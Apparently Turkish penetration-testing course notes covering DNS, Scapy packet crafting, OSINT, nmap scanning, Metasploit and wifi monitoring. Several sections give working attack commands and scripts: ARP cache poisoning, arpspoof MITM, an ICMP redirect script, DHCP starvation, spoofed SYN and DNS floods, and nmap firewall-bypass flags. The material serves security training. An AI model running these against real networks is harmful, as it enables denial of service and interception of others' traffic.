içinde “linux.org.tr” kaydı olduğu için daha sonraki dns isteklerine cevap
verebilir hale gelmiştir.</p>
<p>linux.org.tr içinde mail ve web siteleri olabileceği için DNS kayıt tipleri
vardır:</p>
<p>A:  Website kayıtları için.</p>
<p>MX: Mail atmak istenildiğinde sorulan DNS kaydıdır.</p>
<p>TXT: Text, validation için kullanılabilir.</p>
<p>CNAME: Yönlendirme yapmak istenildiği zaman kullanılır mesela
admin.linux.org.tr domainini yonetim.linux.org.tr’ye linkleyebiliriz.</p>
<p>AAA: IPv6 kayıtları için.</p>
<pre><code>$ nslookup
&gt; server
Default server: X.X.X.X
Address: X.X.X.X#53
$ dig linux.org.tr
...
linux.org.tr.       2846    IN  A   139.179.179.3
...
$ dig MX linux.org.tr # MAIL Server
linux.org.tr.       7200    IN  MX  10 postaci.linux.org.tr.
$ nslookup postaci.linux.org.tr
...
Server:     192.168.42.129
Address:    192.168.42.129#53
...
$ dig NS linux.org.tr # DNS Serverleri
...
linux.org.tr.       7199    IN  NS  marmara.linux.org.tr.
linux.org.tr.       7199    IN  NS  trakya.linux.org.tr.
...
</code></pre>
<pre><code>$ dig . ns # TopLevelDomain listesi
...
.                       94359   IN      NS      c.root-servers.net.
.                       94359   IN      NS      f.root-servers.net.
.                       94359   IN      NS      j.root-servers.net.
.                       94359   IN      NS      d.root-servers.net.
.                       94359   IN      NS      e.root-servers.net.
.                       94359   IN      NS      a.root-servers.net.
.                       94359   IN      NS      l.root-servers.net.
.                       94359   IN      NS      h.root-servers.net.
.                       94359   IN      NS      k.root-servers.net.
.                       94359   IN      NS      m.root-servers.net.
.                       94359   IN      NS      g.root-servers.net.
.                       94359   IN      NS      i.root-servers.net.
.                       94359   IN      NS      b.root-servers.net.
...
$ dig www.linux.org.tr a @a.root-servers.net
...
;; AUTHORITY SECTION:
tr.                     172800  IN      NS      ns21.nic.tr.
tr.                     172800  IN      NS      ns22.nic.tr.
tr.                     172800  IN      NS      ns31.nic.tr.
tr.                     172800  IN      NS      ns41.nic.tr.
tr.                     172800  IN      NS      ns42.nic.tr.
tr.                     172800  IN      NS      ns91.nic.tr.
tr.                     172800  IN      NS      ns92.nic.tr.
...
$ dig www.linux.org.tr a @ns21.nic.tr.
; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; www.linux.org.tr a @ns21.nic.tr.
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 32917
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.linux.org.tr.              IN      A

;; AUTHORITY SECTION:
linux.org.tr.           43200   IN      NS      marmara.linux.org.tr.
linux.org.tr.           43200   IN      NS      trakya.linux.org.tr.

$ dig www.linux.org.tr a @marmara.linux.org.tr

Bu sunucular recursive olmayan isteklere yanıt vermez.
'''

---

'''

$ dig www.tokgozoglu.net @52.178.110.255

; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; www.tokgozoglu.net @52.178.110.255
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 14270
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.tokgozoglu.net.            IN      A

;; ANSWER SECTION:
www.tokgozoglu.net.     86400   IN      CNAME   tokgozoglu.net.
tokgozoglu.net.         86400   IN      A       52.178.110.255

;; AUTHORITY SECTION:
tokgozoglu.net.         86400   IN      NS      ns2.tokgozoglu.net.
tokgozoglu.net.         86400   IN      NS      ns1.tokgozoglu.net.

;; ADDITIONAL SECTION:
ns1.tokgozoglu.net.     86400   IN      A       52.178.110.255
ns2.tokgozoglu.net.     86400   IN      A       52.178.110.255

;; Query time: 8 msec
;; SERVER: 52.178.110.255#53(52.178.110.255)
;; WHEN: Mon Jul 23 11:22:12 +03 2018
;; MSG SIZE  rcvd: 145

$ dig www.tokgozoglu.net @8.8.8.8

; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; www.tokgozoglu.net @8.8.8.8
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 15285
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;www.tokgozoglu.net.            IN      A

;; ANSWER SECTION:
www.tokgozoglu.net.     21599   IN      CNAME   tokgozoglu.net.
tokgozoglu.net.         21599   IN      A       188.166.45.9

</code></pre>
<p><strong>[!] İlk sorguda 86400 iken google sunucusunda 21599 olmasının nedeni
google’ın dns sunucusunun cacheinde bu domainin kaydının olmasıdır.</strong></p>
<a class="header" href="#scapy" id="scapy"><h2>Scapy</h2></a>
<pre><code>$ scapy
&gt;&gt;&gt; ip = IP(dst=&quot;192.168.42.129&quot;,version=4)
&gt;&gt;&gt; ud = UDP(sport=61,dport=53)
&gt;&gt;&gt; dn = DNS(rd=1,qd=DNSQR(qname=&quot;linux.org.tr&quot;))
&gt;&gt;&gt; send(ip/ud/dn)
</code></pre>
<p><strong>[!] Wireshark üzerinden dönen dns sorgusu incelenebilir.</strong></p>
<pre><code>$ hping3 # Paket üretmek için kullanılabilir
$ hping3 --udp --destport 53 --rand-source &lt;NSServer&gt; --flood
</code></pre>
<a class="header" href="#icmpv4" id="icmpv4"><h1>ICMPv4</h1></a>
<p>ICMP (Internet Control Message Protocol) Ağın sağlıklı bir şekilde çalıştığı,
ulaşılabilirliği, hız testi veya kontrol amaçlı kullanılan protokoldür.  Kendi
içerisinde bulunnan Type-Code olmak üzere değiştirilebilen variyantları
bulunmaktadır. Örnek olarak echo-reply 0-0 veya echo-request 8-0 verilebilir.</p>
<p>Daha fazla parametre <a href="https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml">için</a></p>
<p>ICMP type-code hakkında daha fazla örnek için;</p>
<ul>
<li>
<p><a href="https://tools.ietf.org/html/rfc792">Rfc792</a></p>
</li>
<li>
<p><a href="https://tools.ietf.org/html/rfc777">Rfc777</a></p>
</li>
<li>
<p><a href="https://wiki.wireshark.org/SampleCaptures">Wireshark Örnek Paketler</a></p>
</li>
</ul>
<p><strong>[!] OSI katmanı teorik olduğu ve kurulumu tam olarak yapılamayacağı için
TCP/IP modeli kullanılır</strong></p>
<hr />
<p>##Scapy</p>
<p>Scapy içerisinde paket oluşturmak için kullanılan bir kütüphanedir.</p>
<pre><code>$ scapy
&gt;&gt;&gt; icmpbaslik = ICMP(type=14,code=0)
&gt;&gt;&gt; ipbaslik = IP(src=&quot;192.168.42.82&quot;,dst=&quot;192.168.42.57&quot;)
&gt;&gt;&gt; paket = ipbaslik/icmpbaslik
&gt;&gt;&gt; send(paket)
.
Sent 1 packets.
</code></pre>
<p><strong>[!] Wireshark açıp ilgili network kartını dinleyerek gönderilen paketin
yanıtını görebiliriz.</strong></p>
<p><img src="pic/icmp-timestamp.png" alt="icmp-timestamp" /></p>
<a class="header" href="#arp" id="arp"><h1>ARP</h1></a>
<p>Adres Çözümleme Protokolü (Address Resolution Protocol) ağ katmanı adreslerinin
veri bağlantısı katmanı adreslerine (IP adreslerinin MAC adreslerine)
çözümlenmesini sağlayan bir iletişim protokolüdür</p>
<p><strong>[!] Daha önceden ekli olmayan mac adresinin ip adresi değiştirilemez</strong></p>
<a class="header" href="#arp-tablosunda-ip-adresini-değiştirmek-için" id="arp-tablosunda-ip-adresini-değiştirmek-için"><h2>ARP tablosunda IP adresini değiştirmek için</h2></a>
<pre><code>(kurban) $ arp -an
? (192.168.42.40) at 08:00:27:54:f1:62 [ether] on enp0s16u2
</code></pre>
<pre><code>(saldırgan) $ scapy
&gt;&gt;&gt; etherbaslik= Ether(dst=&quot;ea:0e:3d:8f:cc:e0&quot;,src=&quot;31:30:31:31:31:31&quot;)
&gt;&gt;&gt; arpbaslik = ARP(op=2, hwsrc=&quot;31:30:31:31:31:31&quot;,psrc=&quot;192.168.42.30&quot;,pdst=&quot;192.168.42.57&quot;)
&gt;&gt;&gt; paket = etherbaslik/arpbaslik
&gt;&gt;&gt; sendp(paket,iface=&quot;enp0s8&quot;)
.
Sent 1 packets.
</code></pre>
<pre><code>(kurban) $ arp -an
? (192.168.42.40) at 31:30:31:31:31:31 [ether] on enp0s16u2

</code></pre>
<hr />
<a class="header" href="#arp-tablosuna-ip-eklemek-için" id="arp-tablosuna-ip-eklemek-için"><h2>ARP tablosuna IP eklemek için</h2></a>
<pre><code>(kurban) $ arp -an
 ? (192.168.42.129) at 8e:5d:7a:f1:c0:4f [ether] on enp0s16u2
</code></pre>
<pre><code>(saldırgan) $ scapy
&gt;&gt;&gt; etherbaslik= Ether(dst=&quot;ff:ff:ff:ff:ff:ff&quot;,src=&quot;08:00:27:54:f1:62&quot;)
&gt;&gt;&gt; arpbaslik = ARP(op=1, hwsrc=&quot;08:00:27:54:f1:61&quot;,psrc=&quot;192.168.42.40&quot;,pdst=&quot;192.168.42.57&quot;)
&gt;&gt;&gt; paket = etherbaslik/arpbaslik
&gt;&gt;&gt; sendp(paket,iface=&quot;enp0s8&quot;)
.
Sent 1 packets.

</code></pre>
<pre><code>(kurban) $ arp -an
 ? (192.168.42.129) at 8e:5d:7a:f1:c0:4f [ether] on enp0s16u2
 ? (192.168.42.40) at 08:00:27:54:f1:61 [ether] on enp0s16u2
</code></pre>
<a class="header" href="#dhcpdynamic-host-configuration-protocol" id="dhcpdynamic-host-configuration-protocol"><h1>DHCP(Dynamic Host Configuration Protocol)</h1></a>
<p>Dinamik olarak ağa katılan bilgisayarlara ip ataması yapan server. Broadcast
yaparken UDP kullanır (TCP’de 3way-handshake olduğu için zaten ip adresi olması
gerekir). DHCP, ip aralığı içinde olan bir adresi yeni gelen makinalara
dağıtır. DHCP kira süresi ayarlanabilir olmakla birlikte belirli süreler
içerisinde kira süresini tekrar yeniler. Kira süresi bittikten sonra
yenilenmesi durumunda aynı ip adresini vermek gibi bir zorunluluk bulunmaz.</p>
<a class="header" href="#scapy-1" id="scapy-1"><h2>Scapy</h2></a>
<p>DHCP isteğinde client 68. UDP portundan dinlerken DHCP server 68. UDP portundan
cevap verir.</p>
<pre><code>$ scapy
&gt;&gt;&gt; eth = Ether(dst=&quot;ff:ff:ff:ff:ff:ff&quot;,src=&quot;aa:aa:aa:aa:aa:aa&quot;)
&gt;&gt;&gt; ip  = IP(src=&quot;0.0.0.0&quot;,dst=&quot;255.255.255.255&quot;)
&gt;&gt;&gt; ud  = UDP(sport=68,dport=67)
&gt;&gt;&gt; bootp = BOOTP(chaddr=&quot;aa:aa:aa:aa:aa:aa&quot;, xid=100)
&gt;&gt;&gt; dhcp = DHCP(options = [ (&quot;message-type&quot;,&quot;request&quot;),(&quot;server_id&quot;,&quot;192.168.42.254&quot;),(&quot;requested_addr&quot;,&quot;192.168.42.254&quot;),&quot;end&quot;])
&gt;&gt;&gt; sendp(eth/ip/ud/bootp/dhcp)

</code></pre>
<ul>
<li>Ön Toplantı</li>
<li>Bilgi Toplama
<ul>
<li>Aktif</li>
<li>Pasif</li>
</ul>
</li>
<li>Zafiyet Tespiti</li>
<li>Zafiyet Sömürüsü
<ul>
<li>0day</li>
</ul>
</li>
<li>Post-Exploitation</li>
<li>Raporlama</li>
<li>Son Toplantı</li>
</ul>
<a class="header" href="#osint" id="osint"><h1>OSINT</h1></a>
<ul>
<li><strong>Seviye 1</strong> : Otomatize araçlarla toplanıp sınır çizilir.</li>
<li><strong>Seviye 2</strong> : Kurum hakkında detaylı bilgi toplanır. (RED-TEAM)</li>
<li><strong>Seviye 3</strong> : Askeri, Devletler arası yapılır.</li>
</ul>
<p>Bilgi Toplama:</p>
<ul>
<li><strong>Pasif</strong> : Normal kullanıcıdan fark edilemeyecek şekilde bilgi toplamak</li>
<li><strong>Aktif</strong> : Hedefle doğrudan etkileşim halinde olunması (ServisTaraması,
Fuzzing)</li>
</ul>
<p>Sızma Testleri:</p>
<ul>
<li><strong>White</strong> : Kaynak kod analizi</li>
<li><strong>Gray</strong> : Farklı seviyelerde kullanıcılar verilerek verilebilecek zarar
hesaplanır</li>
<li><strong>Black</strong> : Sistem hakkında herhangi bir şey bilinmez</li>
</ul>
<p><strong>Ağ Kapsam:</strong> Sistemin ağ kapsamı ne kadar geniş hangi ip adreslerine <strong>Otonom
Sistem Numarası</strong> kullanarak hangi ip aralığına sahip olduğu araştırılır.</p>
<p><strong>Ağ Mimarisi:</strong> Sunucular hakkında bilgiler toplanır.</p>
<p><strong>Aracıların Kullanılması:</strong> İnternetten arama yapılabilir.</p>
<p><strong>Çalışanlar:</strong> IT ekibi veya kaynak kod analizi yapılır.</p>
<p><strong>İfşalar:</strong> İfşa olmuş daha önce hacklenilmiş bilgilerin araştırılması.</p>
<p><strong>Unutulmuş Dosya ve Dizin:</strong> Sistemde hatırlanmayan bir sistemin veya bir
dizinin unutulmuş olması araştırılır.</p>
<p><strong>Subdomain/VirtualHost:</strong> Sistemin sahip olduğu alt alan adları araştırılır.
Sunucuda başka sitelerin hizmetleride olabilir bunları araştırmak.</p>
<hr />
<p><a href="http://www.irr.net/docs/list.html">Ters Domain Sorgusu yapılabilecek Siteler</a></p>
<p><a href="https://www.robtex.com/">Topoloji Çıkarabilecek Bir Site</a></p>
<p><a href="https://viewdns.info/">Mail Adresinden Domain Bulmak</a></p>
<p><em><strong>Subnet, AS</strong> Otonom sistem numarası yakalanabilir.</em></p>
<p><code>$ whois -h whois.radb.net &lt;ip&gt;</code></p>
<p><code>$ whois -h whois.radb.net '!g&lt;AS****&gt;'</code></p>
<a class="header" href="#google-dork" id="google-dork"><h2>Google Dork</h2></a>
<ul>
<li>intext:</li>
<li>inurl:</li>
<li>site:</li>
<li>filetype:</li>
<li>inbody:</li>
<li>intitle:</li>
<li>-</li>
<li>“ “</li>
<li>numrange:</li>
</ul>
<a class="header" href="#bing-dork" id="bing-dork"><h2>Bing Dork</h2></a>
<ul>
<li>ip:</li>
<li>domain:</li>
</ul>
<a class="header" href="#mail" id="mail"><h2>Mail</h2></a>
<ul>
<li>theharvester</li>
<li><a href="https://haveibeenpwned.com/">haveibeenpwned</a></li>
</ul>
<a class="header" href="#dns-1" id="dns-1"><h2>DNS</h2></a>
<ul>
<li>
<p>fierce</p>
<ul>
<li>Zone Transfer (axfr domain @ns)</li>
</ul>
</li>
<li>
<p>dig axfr @<site> zonetransfer.me</p>
</li>
<li>
<p><a href="https://dnsdumpster.com/">dnsdumpster</a></p>
</li>
<li>
<p><a href="https://www.shodan.io/">Shodan</a></p>
<ul>
<li>hostname:</li>
<li>country:</li>
<li>os:</li>
<li>net:</li>
</ul>
</li>
</ul>
<hr />
<p><a href="https://www.wappalyzer.com/">WAPPALYZER</a></p>
<p><a href="https://censys.io/">Censys</a></p>
<p><a href="https://archive.org/">Archive</a></p>
<p><a href="http://ipv4info.com/">IPv4Info</a></p>
<p><a href="https://securitytrails.com/dns-trails">DNSTrails</a></p>
<p><a href="https://www.netcraft.com">Netcraft</a></p>
<p><a href="https://www.tineye.com">TinyEye</a></p>
<a class="header" href="#aktif-bilgi-tarama" id="aktif-bilgi-tarama"><h1>Aktif Bilgi Tarama</h1></a>
<ul>
<li>Host Discovery
<ul>
<li>netdiscover -r &gt;ipBLOĞU&lt;</li>
<li>arp-scan -I eth0 -l</li>
</ul>
</li>
<li>Network Discovery
<ul>
<li>nmap -sP &gt;ipBLOĞU&lt; #pingSweep</li>
<li>nmap -oX scan.xml # xsltproc xml -&gt; html</li>
</ul>
</li>
<li>Port Scanning
<ul>
<li>nmap -sS #SYN, -sT #TCP, -sA #ACK, -sF #FIN, -sU #UDP</li>
<li>nmap -p-, --top-ports</li>
<li>nmap -sI # Zombie Scan</li>
<li>nmap -f # FTP Scan</li>
<li>nmap -Pn --disable-arp-ping # Hiç bir Tarama Yapmaz</li>
</ul>
</li>
<li>Banner Grabbing
<ul>
<li>nc, curl, telnet</li>
</ul>
</li>
<li>Version Detection
<ul>
<li>nmap -sV # Version Scan</li>
<li>nmap -O # OS</li>
</ul>
</li>
<li>Firewall Bypass
<ul>
<li>nmap -f -f</li>
<li>nmap --script=firewall-bypass</li>
<li>nmap -D RND:5</li>
<li>nmap --spoof-mac=IBM &gt;ipBLOĞU&lt;</li>
</ul>
</li>
<li>Agressive Scan
<ul>
<li>nmap -A # Aggressive</li>
<li>nmap -T (0-5)</li>
</ul>
</li>
<li>DNS Discovery
<ul>
<li>nslookup</li>
<li>dig ns , dig -x</li>
<li>fierce --dns</li>
<li>dnsrecon -d</li>
</ul>
</li>
<li>Web Application Discovery
<ul>
<li>WP, Drupal, Joomla</li>
<li>wafw00f</li>
</ul>
</li>
<li>Fuzzing
<ul>
<li>dirb</li>
<li>dirbuster</li>
<li>wfuzz</li>
<li>nikto</li>
</ul>
</li>
<li>Internal
<ul>
<li>Internal Ranges</li>
<li>Directory Services</li>
<li>Enterprise Applications</li>
</ul>
</li>
</ul>
<a class="header" href="#mitm-man-in-the-middle" id="mitm-man-in-the-middle"><h1>MITM (Man In The Middle)</h1></a>
<p>Bir ağ içerisindeki sistem kendi bağlantılarını başkası üzerinden geçiriyor ise
arada kalan sistem akan trafiği inceleyebilir. Bunu yapmaktaki amaç arada akan
trafiği incelemek veya farklı bir müdahalede bulunmak. Örnek olarak iki farklı
yöntem vardır.</p>
<ul>
<li>DHCP</li>
<li>ARP</li>
<li>Layer 3 (ICMP)</li>
<li>TCP</li>
</ul>
<a class="header" href="#arp-1" id="arp-1"><h2>ARP</h2></a>
<p><strong>[!] Bunu yapabilmek için Arp Adresleriyle oynamak daha kolay olduğu için DHCP
serverini indirmek yerine <a href="ARP.html">ARP</a> konusunda yaptığımız gibi mac
adreslerini değiştirmeliyiz.</strong></p>
<pre><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward # Routing Özelliğini Açar
arpspoof -c both -t 1.1.1.1 -r 2.2.2.2 # Router ve Hedef Sistemin Arp Tablosunu Zehirler
</code></pre>
<p>Veya scapy kullanmak istersek.</p>
<pre><code>ethBaslik = Ether(dst=&quot;00:0c:29:fe:7b:ea&quot;,src=&quot;00:0c:29:14:3c:c9&quot;)
ARPBaslik = ARP(op=1, hwsrc=&quot;00:0c:29:fe:7b:ea&quot;,psrc=&quot;1.1.1.1&quot;,pdst=&quot;2.2.2.2&quot;)
sendp(ethBaslik/ARPBaslik)
</code></pre>
<a class="header" href="#icmp" id="icmp"><h2>ICMP</h2></a>
<p>ICMP Redirect paketi kullanarak trafiğin akışı değiştirilebilir.</p>
<p>Kurban sisteme icmp redirect paketi kaynak olarak router gösterilerek router
olarak kendi adresimizi gönderirsek eğer giden paketleri yakalayabiliriz.
Buradaki sıkıntı paketin içinde source kısmı kurban sistem olduğu için router
gelen paketi saldırgana göndermez. Gelen paketi yakalayabilmek için TCP paketi
içerisindeki source kısmını kurban ip yerine saldırganın ip adresini yapılmalı
ki router gelen cevabı saldırgana gönderebilsin.</p>
<pre><code>#!/bin/python2.7
from scapy.all import *

originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''

# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags=&quot;S&quot;
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Release the Kraken!
while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
</code></pre>
<p>Paket Kurbandan adresinden çıkarken kaynak kısmını değiştirmek için iptables
kullanılabilir.</p>
<pre><code>iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
</code></pre>
<a class="header" href="#dhcp" id="dhcp"><h2>DHCP</h2></a>
<p><strong>DHCP servisini indirip</strong> kendi dhcp servisimizi başlatarak gateway adresini
değiştirerek bunu başarabiliriz.</p>
<p>İlk olarak DHCP sunucusundaki havuzu doldurmak (DHCP-Starve)</p>
<pre><code>$ scapy
for i in range(2,255):
    mac = str(RandMAC())
    dhcpServerID=&quot;192.168.255.51&quot;
    eth = Ether(dst=&quot;ff:ff:ff:ff:ff:ff&quot;,src=mac)
    ip  = IP(src=&quot;0.0.0.0&quot;,dst=&quot;255.255.255.255&quot;)
    ud  = UDP(sport=68,dport=67)
    bootp = BOOTP(chaddr=mac)
    dhcp = DHCP(options = [ (&quot;message-type&quot;,&quot;request&quot;),(&quot;requested_addr&quot;,&quot;192.168.255.&quot;+str(i)),(&quot;server_id&quot;,dhcpServerID),&quot;end&quot;])
    sendp(eth/ip/ud/bootp/dhcp)
</code></pre>
<p>daha sonra bir dhcp sunucusunu ayağa kaldırıp broadcastte dhcp keşfi aryan
makinalara ip adresini vererek trafiği inceleyebiliriz. DHCP server olarak
<strong>dnsmasq</strong> örnek verilebilir.</p>
<a class="header" href="#tcp-1" id="tcp-1"><h2>TCP</h2></a>
<p>TCP/Dos saldırısı TCP/SYN paketinin kaynak ip ve port bilgilerini değiştirerek
gönderebilir. Servise yönelik yapılacağı zaman daha etkilidir.</p>
<p>Scapy kullanarak şu şekilde yapılabilir:</p>
<pre><code>$ scapy
ip = IP(src=RandIP(),dst=&quot;0.0.0.0&quot;)
tcp = TCP(sport=RandShort(),dport=80,flags=&quot;S&quot;)
paket = ip/tcp
send(paket,loop=1)
</code></pre>
<p>mz adlı aracı kullanmak istersek:</p>
<pre><code>mz -B &gt;ip&lt; -t tcp &quot;sp=1-65535,dp=80,flags=syn&quot; -c 0
</code></pre>
<hr />
<a class="header" href="#syncookie" id="syncookie"><h3>SynCookie</h3></a>
<p>Sunucu ilk açıldığında rastgele bir sayı üretilir ve bu <strong>X</strong> sayısı kaynak ip,
kaynak port ve hedef port ile toplanır. Sunucuya gelen SYN+ACK requestinde
gelende seq numarasını bir azaltıp geriye doğru kontrol eder. Bu sayede
sunucudaki tablonun doldurulması engellenebilir.</p>
<pre><code>---SYN---&gt;
&lt;--SYN-ACK- # sequenceNumarası = KaynakIP + KaynakPort + HedefPort + X
---ACK---&gt;  # Burda Client acknowledgeNumarasına sequenceNumarası+1 yazmalı
</code></pre>
<p>Yukarıdaki gibi bir 3 way handshake işleminde, Sunucu tarafında gelen
acknowledge kısmını bir azaltıp adresleri kontrol ederek oturumun başarılı bir
şekilde devam ettiğini daha az masrafla tablo kullanmadan anlayabilir.</p>
<p><strong>[!] Ubuntu Serverda bu özellik varsayılan olarak aktiftir.</strong></p>
<a class="header" href="#dns-zehirlenmesi-dns-poisoning" id="dns-zehirlenmesi-dns-poisoning"><h1>DNS Zehirlenmesi (DNS POISONING)</h1></a>
<p>DNS sunucusuna kendisinde olmayan bir kaydı sorup aynı zamanda sorusunun
cevabını da yollaması halinde DNS sunucusunun cacheine istediği kaydı
yazdırabilir.</p>
<p>IP adresi bilinmeyen bir siteyi recurse olarak <strong>sorgulamazsak.</strong></p>
<pre><code>$ dig 0xf61.com +norecurse
; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; 0xf61.com +norecurse
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: SERVFAIL, id: 13176
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;0xf61.com.      IN  A

;; Query time: 1 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sun Jul 29 11:07:03 +03 2018
;; MSG SIZE  rcvd: 49
</code></pre>
<hr />
<p>IP adresi bilinmeyen bir siteyi recurse olarak <strong>sorgularsak.</strong></p>
<pre><code>
$ dig 0xf61.com

; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; 0xf61.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 58885
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;0xf61.com.      IN  A

;; ANSWER SECTION:
0xf61.com.   3599    IN  A   1.1.1.1

;; Query time: 103 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sun Jul 29 11:07:07 +03 2018
;; MSG SIZE  rcvd: 65
</code></pre>
<hr />
<p>Tekrardan recurse sorgu olmadan sorarsak.</p>
<pre><code>$ dig 0xf61.com +norecurse

; &lt;&lt;&gt;&gt; DiG 9.10.3-P4-Debian &lt;&lt;&gt;&gt; 0xf61.com +norecurse
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 50059
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;0xf61.com.      IN  A

;; ANSWER SECTION:
0xf61.com.   3596    IN  A   1.1.1.1

;; Query time: 2 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sun Jul 29 11:07:10 +03 2018
;; MSG SIZE  rcvd: 65

</code></pre>
<a class="header" href="#zafiyet" id="zafiyet"><h1>Zafiyet</h1></a>
<p>Riski oluşturan erişim noktasıdır.</p>
<a class="header" href="#zafiyet-türleri" id="zafiyet-türleri"><h2>Zafiyet Türleri</h2></a>
<ul>
<li>Sömürü Tipleri:
<ul>
<li>Remote (Uzaktan Erişim sağlanır.)</li>
<li>Local (Doğrudan Erişim gerekir.)</li>
<li>0-Day (Sıfırıncı Gün Açığı)</li>
</ul>
</li>
<li>Payload
<ul>
<li>Reverse: Sunucu -&gt; Client</li>
<li>Bind: Client -&gt; Sunucu</li>
</ul>
</li>
<li>PostExxploitation</li>
<li>Otomatize
<ul>
<li><a href="https://www.tenable.com/downloads/nessus">Nessus</a>
<ul>
<li><a href="https://www.tenable.com/products/nessus/activation-code">Aktivasyon</a></li>
</ul>
</li>
<li><a href="https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/">OpenVAS</a></li>
<li>Core Impact</li>
</ul>
</li>
<li>Version/Patch
<ul>
<li>exploit-db.com</li>
<li>cvedetails.com</li>
<li>0day.today</li>
<li>github.com</li>
</ul>
</li>
<li>Nmap
<ul>
<li>--scripts=vulners
<ul>
<li>smb-vuln-ms08-67.nse</li>
</ul>
</li>
</ul>
</li>
<li>Nikto</li>
<li>Fuzzing</li>
</ul>
<a class="header" href="#zafiyet-İstismarı" id="zafiyet-İstismarı"><h2>Zafiyet İstismarı</h2></a>
<ul>
<li>Kaynak Koddan</li>
<li>Uygulama Çatıları
<ul>
<li>Metasploit-Framework
<ul>
<li>Auxiliary: Sistemi tanımaya yarayan modüller</li>
<li>Exploit: Zafiyeti sömürmek için kullanılabilecek modüller</li>
<li>Payload: Zafiyet sömürüldükten sonra çalıştırılabilecek modüller</li>
<li>Post: Sisteme erişildikten sonra yetki yükseltmek veya verilerini
almak gibi modüller bulundurur</li>
<li>Encoders: Oluşturulan bir çalıştırılabilir dosyayı antivirüs
programlarından kaçırmak için modüller.</li>
<li>Meterpreter: Bir çeşit kabuk(shell) denilebilir. Port yönlendirme,
ekran görüntüsü alma ve klavye tuşlarını yakalamak gibi ekstra
özelliklere sahiptir.</li>
</ul>
</li>
<li>Msfvenom
<ul>
<li>-p #Payload, -f #Format</li>
<li>Encoders
<ul>
<li>--list-encoders</li>
<li>-e</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">g0tmi1k</a>  :  <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">Usage</a>
<a href="https://github.com/DominicBreuker/pspy">PsPy</a></p>
<a class="header" href="#bazı-ctf-sitelerine-örnek-vermek-gerekirse" id="bazı-ctf-sitelerine-örnek-vermek-gerekirse"><h3>Bazı CTF sitelerine örnek vermek gerekirse.</h3></a>
<p><a href="https://ctftime.org/">CTFTIME</a></p>
<p><a href="https://github.com/ctfs">CTFS</a></p>
<p><a href="http://vulnhub.com/">Vulnhub</a></p>
<p><a href="https://www.hackthebox.eu/">HACKTHEBOX</a></p>
<p>Kablosuz ağ güvenliği için eğer donanım monitör modunu desteklemiyorsa harici
bir ağ kartına ihtiyaç vardır.</p>
<p>Donanımı dinleme moduna almak gerekiyor.</p>
<pre><code>airmon-ng start wlan0 # wlan0 --&gt; wlan0mon
</code></pre>
<p>Etraftaki sinyalleri görmek için airodump-ng kullanılır.</p>
<pre><code>airodump-ng wlan0mon
</code></pre>
<p>Donanımı dinleme modundan çıkarmak için.</p>
<pre><code>airmon-ng stop wlan0 # wlan0mon --&gt; wlan0
</code></pre>
<hr />
<p><strong>BSSID:</strong> Kablosuz kartının fiziki mac adresi</p>
